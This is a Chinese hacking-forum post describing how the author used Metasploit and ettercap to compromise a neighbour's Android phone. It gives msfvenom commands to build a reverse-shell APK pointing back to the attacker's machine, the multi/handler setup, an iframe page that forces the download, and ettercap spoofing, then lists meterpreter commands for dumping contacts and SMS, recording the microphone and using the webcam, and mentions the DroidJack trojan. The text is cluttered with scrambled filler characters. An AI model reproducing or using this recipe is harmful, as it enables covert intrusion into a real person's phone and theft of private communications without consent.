找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1619|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

8 S0 ], o \( i! \; H 五、msf+ettercap入侵邻居安卓手机 9 H& s; j6 I1 U& o. y( G! \

7 B' Z- y- i- r7 w: X# \' T! x

) `' ^! H0 T4 G3 G6 I6 P S* } 首先启动msf ; {- q, |, T5 O' V

; b# F6 |: J2 Z. x

8 D6 n3 x# \/ o8 n, R 先用kali生成一个安卓木马,如下命令: : H9 U! Q3 \& c* K7 b

% r" Z5 G5 Z8 ^

) b- j6 s3 Z5 {0 `7 z; o Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk " A- w9 o @' P. e

. R1 [3 o: g: z( o0 p, F, n3 G

( d9 \6 M: G! o) L/ |) W- U 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 : c8 K f9 s7 I' [

& B& n* u% M* x8 E1 ?- d

, m4 y% L; ?0 G* R! h5 @3 _ 然后进入msf , T+ m( E& x) j4 o9 [$ k- l

7 D% M" m2 R' X- [, X# b

( K* F8 o k! E# W! P, g/ t f( D use exploit/multi/handler + Q. u9 S l( Z* P

# `1 H" _2 R$ A( ~

$ G1 \" F2 E. S7 Z* X set payload android/meterpreter/reverse_tcp 0 M( M# Y+ ~5 E. s: J1 ?( m5 ~7 T

9 y! H4 R" y+ [4 ]) U' |3 o- T

6 y8 ]4 E6 S; Q A& t" [ set LHOST 192.168.0.109 //ipkailiip 5 C. X7 P* q0 }. F" p' W1 J1 e% f

7 @2 d, Q* t% h4 G

$ O* y6 w0 k% v7 ` set LPORT 44444 //端口一定要与前面生成的木马的端口一致 : D# q. P8 x* o: i; @

* l: l" R+ d" q: w( s" C

( y; d6 i( i+ r C0 @0 A8 y Exploit & @- B) y: R- u) ^ l( b

" Q! k. ~* i5 e. I

4 [% @5 O+ n) c   : M# J6 |+ c# n8 |. ]

7 V7 @- g6 l* B8 P' x

( w8 J) r, d8 B; i% m 下面我们开启ettercap -G ; P( j1 T% F* }! c* J

# s7 G2 n& X/ r8 z, g

* p! x3 _8 l* M 我物理IP 1 y* a) o: C1 `

9 L5 e8 |& @) T- s6 S4 F& i/ M: H

/ B0 }1 ]0 i- W8 }% M+ m5 A/ U   ]( I5 w/ t) q2 \9 L/ _

; a- G2 X: B8 j% |* x1 _( |

* |. S; y& `4 x" h, z3 L 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 3 q# H( w4 D. c; i3 N) Y4 S$ G

. H* {. G `# f6 R

& k& m1 S0 ^7 v7 `5 Z 下面我们来设置一下 ! n0 d% }8 g' z& `* r

! b1 R! X$ B8 r+ f5 ] w1 B0 Q

6 _; s2 B! d3 p- ]6 Y   / F+ a& @1 Q' N

% {4 l1 z( T/ L

- n; ? a* \4 [% }: x: T 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 9 s' p; x! d+ A

5 i- M' a# T; h/ S

2 }, Z/ \, }/ O   * {4 X+ T& o6 s% I- {$ V# H

" ^, B+ r& Z( D K. ^

' h2 ]2 L$ V+ Z% _   2 ^# S' W9 {4 ^. R4 e! l5 {

' S$ z0 k- e# v, c, C0 {& w

4 j; r7 _% s. W3 D( K, A3 r   $ X5 |! x e" g$ K x A$ D3 [6 b

* K9 V9 A0 B+ U- v# _/ O4 ~

0 _. ]4 h! f) i6 O* ]4 {- ~   1 m6 p3 j& g4 T7 ~/ j

" ]; S. B. g% N& x! @( q" |: z

! P: L1 B' c3 |) @" ]* C8 I) y   1 k5 l' n! i0 F

; s9 x o$ Q2 f& \3 l: s1 r

+ a4 r$ M* H& Q/ q   / ?0 e: a) F! L7 ~3 t

' P/ ^ L) U8 C% Y

8 a/ S6 c4 p/ }   + Y2 I3 I, k$ D6 J+ h" r$ ]

% v2 h9 c% H* R! A

8 W9 v+ ?: f7 c6 o# M   # w4 q8 j8 j$ R! G# ^* P/ M

$ b* ?! k5 M/ ]

: t/ \9 l7 U& ~   & C7 c- P( r' X0 V T

6 ?0 p8 |# s; Y' h( |

8 d- b( ?5 o2 Q& r6 a6 A4 T) f! j   4 r; _2 X; n y7 w7 A7 \7 @

0 f# j W* s# G5 e( n+ C% i" F3 D

8 n, L( b- Q8 F   % |1 d& p7 t7 y4 [) ?

4 H/ k2 e; T' ]) c ?. {$ c" F6 W

2 b/ y5 P% X# N! B1 y   : z+ y H5 x7 N

8 t! j8 I9 F: W- V6 V' w. B2 C' s

( R9 c) \ R& a1 C0 Y# G   ! Z/ w% Z9 h4 f$ C

/ q% ^. s/ N. v; J3 P- v

$ V% b2 [+ H$ T% @! Y$ k4 \ 下面我们开始攻击 $ ]' K5 [; m& m% ~

' \8 O! I P; h+ P( Z

9 e* y* h9 J0 [6 y! |   ) I$ s/ G2 L& o9 h$ T

* \, Y" x- i' `6 ]# n

4 {$ _5 K! k0 M) @   6 @' K5 O3 X) L( d1 t$ `6 y

+ c1 L3 T. A* A e

1 b$ k8 \) D( T0 ?7 @   * _- w* E2 W/ [. l' q# ?2 J

; q0 h- t( r/ v) i& U! q. }

: T: N9 m1 b5 a3 K8 \3 a& l5 I0 U   " _* S% Z b9 ^* _

1 v( M. y6 u1 ]

# N4 | r" [9 U8 W: }* B   7 n0 ^1 t8 {6 r4 N2 a. I

! z! v; G8 z# [! Z" h. E

o" F1 k* t% X 大概过了5分钟多,发现反弹成功了 6 C1 m) C; E" ^) Y7 t ~+ P& c

0 F3 J' F8 I& I/ |3 E$ A

" s" ^3 u/ E6 N( V3 e* J* z   ( R- z$ a0 _! A; V: C5 K

* [6 N, K1 ?2 p, R! p

8 y- i7 l- D: c; q* j9 ]   : t& T6 w# H: A- ]6 ?! ]1 H

6 Z3 n1 I# V0 p! c3 N

4 L8 B. ^+ w2 Z* C& e   6 i$ q+ M2 n4 |7 a0 f7 S- F

' h# X. t4 G8 S5 c

, ^$ M7 N2 u- w; A0 r) p   + b. Y7 @# R9 K6 w- n: [* r

1 [- b3 m. b4 u% m5 @/ m4 I

* Q& N) g+ t4 {/ v   ~: i* E4 N- l6 C# R- H G

: ?4 B" J+ T. }" O0 g1 W% u, _

* | f; D" Z L8 a( V4 T% d$ [   & I5 t' T8 @' ?6 e$ a

( f! o5 j" x/ k, {( S. H, X2 ?

: S% T$ H! }" C% i/ A   7 ^# @& `% y/ d

" Y0 u5 ~. h" p

. }: x" S, W) w* K; l7 Z 执行命令 ! s+ H L/ t' @) v2 j

$ a, C- S9 e4 i: L0 S) p+ L

: S; i$ j2 J+ c) [   4 ]2 J3 E9 E; a$ ~

" V, ?$ y t" _3 ?

* Q" R7 |! b& r% C1 C* X3 @ dump_contacts    --》这个是导出电话 ; V, b! l8 l; |, R, t

4 a; z& i- U$ x

. ^4 L7 S5 ~) X+ ?0 _ dump_sms --》这个是导出信息 ( I' f A! Z$ j! E! {7 _

8 s" D- a. }7 N# S7 a+ O3 ]

; a( a" q( `8 f& ^4 `/ I% B6 e record_mic     Record audio from the default microphone for X seconds 6 Q5 X$ j. ?& C; |4 b! S

( v; T: E* V. n6 V* O3 D- L+ Z+ I

6 U" c# V" m- Y. r5 `( {     webcam_chat    Start a video chat * F4 K9 I4 ~* n7 q

! v- v& P2 h4 a# S, q$ }

7 Z' p. p# b/ T& C) }. D( `0 X: K     webcam_list    List webcams , e" n) P/ Q @4 ^0 d( s

1 X# R0 y+ K% Y! X

n; {( c5 z$ P+ N! F: M     webcam_snap    Take a snapshot from the specified webcam # z( u7 S( A/ R7 E9 x

: |& }! c2 u" q4 N- w, L

" l* @, R) ]) { webcam_stream  lay a video stream from the specified webcam + V0 d; e' m2 x# x/ h+ C

: n9 O/ M5 }# o* K+ o

/ K/ W! C" A2 v' o   0 ^* [! |. g: o6 V2 V6 N

- L* j$ R4 \+ O6 o+ V0 |

" P' V1 H# p7 b1 f6 K   % T8 A! W1 H& y+ d

" G' h, r; Y, k9 |' A3 h

& c9 z1 H- I. ]0 | 我们打开看一下电话薄, 4 p% l, _$ x8 ?, o) M+ [3 K: g

x" r3 t0 V3 k+ C+ x

# K2 M: u3 S8 ^- P   2 Y' f% \: D% [

( w# L- ^( L9 f

6 q% `- S) S) f, U   4 ^3 _8 A3 S" i0 d$ n" r

$ Q3 ?6 u5 R" o4 j- J1 x

; {+ p" q* e4 z& L. W   & c' L4 B2 {& `+ h, j2 ]' S

- |9 ]2 P; T" J# j, u ^/ `3 r

7 z% l! P1 c6 n% g ~   + a) E o q- u( X

9 ?5 Z! N- X4 a' d

* K$ e% }) X( q   1 z8 e f" M) h

' K" B3 j" ?3 H2 ^( A

+ j0 j1 ^9 p) u7 h6 S- @1 z9 ]) b   6 O2 ~2 O r. H: t

1 T) }2 P# H& _- n

7 I( K& `- ~$ @8 m+ R% }0 ? 我们同时欺骗成DroidJack木马,使用方法如图: # G* a9 T$ F; W5 J: m4 f

8 L' g# \2 s- J3 B: o& k# d2 d

0 t. g7 a2 ^! t7 ]) F& n$ [8 ^   . C( m3 l' B" x2 F

! |3 h: y' V4 Y' {% n' i

1 Y, @! v8 Y* D Z( [9 }/ Y/ d! S& v   $ X; Q7 r" {( c6 f1 V: [1 y! s

5 L, C0 \6 u5 m4 J- P& i

% h% h+ P) t4 S7 b" B. j& ^   " x" V" P) z( E; ~" A; B1 B3 ^, {

* p, u. h- z0 N8 o/ \: Y

. Z9 b8 g& e# t& V' \ 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ; b% T- P+ M# q

' E9 f" r+ p4 T+ f7 H8 S) }

% F) {- e+ m) w `5 x% ?0 ?   . o+ f H2 }2 y

7 q( S9 Y; v; v! d

6 S O0 x' q' C. |4 u d4 h) n   & A5 l4 W3 F7 b& A% c& S

" V1 j& l9 q2 a6 R

8 q, [4 N4 ]- u, p/ m5 ^, n" ?. X   " h0 r0 p8 i1 P1 I. {& e

: X7 G/ S) S1 q

, T. [% p0 ]3 g ; F: p5 t' `7 w+ m' x" D( L

4 l! M! G+ W, w0 z9 c+ ]

9 f" ]2 {* l, b x- M2 a3 `+ E
$ J2 o e( T! [2 Y3 R! V

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表